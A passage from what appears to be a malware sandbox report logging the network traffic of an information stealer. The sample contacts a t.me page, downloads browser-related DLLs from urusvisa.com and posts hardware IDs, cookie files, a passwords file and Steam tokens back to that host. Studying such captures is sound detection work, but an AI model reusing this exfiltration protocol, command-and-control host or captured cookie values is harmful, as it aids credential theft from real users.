6e 28 14 ad dd b4 3f 25 4e 12 c8 d5 d4 67 c6 11 96 51 94 25 a2 25 e1 c9 af 49 72 6f 14 30 e1 06 88 48 09 66 d4 2e 77 2b 5e cf cc f7 63 c7 1d f7 69 9e d9 2f 86 27 c3 ae d5 e9 46 fb 7f fd a9 f0 1d c8 a2 cc 12 46 52 f1 45 fa 74 96 c1 05 9d 2b 76 9c 37 53 8d 67 aa ec 17 33 dc f6 ab 8e da 7d a5 28 c8 b8 c0 a7 48 a1 b2 ba 29 17 75 21 5f 35 fb b1 02 59 62 8e 0a 85 74 8

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=e24bf01cb1dccc3d2c_1091684912320142115
Source: global traffic	HTTP traffic detected: GET /jamsemlg HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=e24bf01cb1dccc3d2c_1091684912320142115
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: urusvisa.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 41 35 30 36 37 31 43 34 38 41 33 37 38 38 39 35 32 38 38 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 2d 2d 0d 0a Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="hwid"54A50671C48A3788952882-a33c7340-61ca------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------FCGIJDBAFCBAAKECGDGC--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 2d 2d 0d 0a Data Ascii: ------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="mode"1------HIDHIEGIIIECAKEBFBAA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIEHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 2d 2d 0d 0a Data Ascii: ------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="mode"2------KKFCAAKFBAEHJJJJDHIE--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBHost: urusvisa.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="mode"21------HDBGHDHCGHCAAKEBKECB--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGDGHCBGDHJJKECAECBHost: urusvisa.comContent-Length: 7641Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGIJEHIIDGCFHIEGDGCHost: urusvisa.comContent-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 49 4a 45 48 49 49 44 47 43 46 48 49 45 47 44 47 43 2d 2d 0d 0a Data Ascii: ------DBGIJEHIIDGCFHIEGDGCContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------DBGIJEHIIDGCFHIEGDGCContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------DBGIJEHIIDGCFHIEGDGCContent-Disposition: form-data; name="file_name"Q29va2llc
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKEBGIIDAFIDHIIECFHost: urusvisa.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 45 42 47 49 49 44 41 46 49 44 48 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------CBAKEBGIIDAFIDHIIECFContent-Disposition: form-data; name="file_data"------CBAKEBGIIDAFIDHIIECF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKEBFBAKKFCBGDHDGHDHost: urusvisa.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 2d 2d 0d 0a Data Ascii: ------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="file_data"------BAKEBFBAKKFCBGDHDGHD--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: urusvisa.comContent-Length: 1025Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 45 48 44 48 49 49 4a 4b 45 43 42 4b 45 42 41 2d 2d 0d 0a Data Ascii: ------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------BGDAAEHDHIIJKECBKEBAContent-Disposition: form-data; name="mode"3------BGDAAEHDHIIJKECBKEBA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJKHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="mode"4------GDGDHJJDGHCAAAKEHIJK--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: urusvisa.comContent-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4f 68 4a 66 2f 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 2d 2d 0d 0a Data Ascii: ------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="file_data"OhJf/g==------AEBKFIJEGCAAFHJKFCFC--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECFHost: urusvisa.comContent-Length: 130481Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 2d 2d 0d 0a 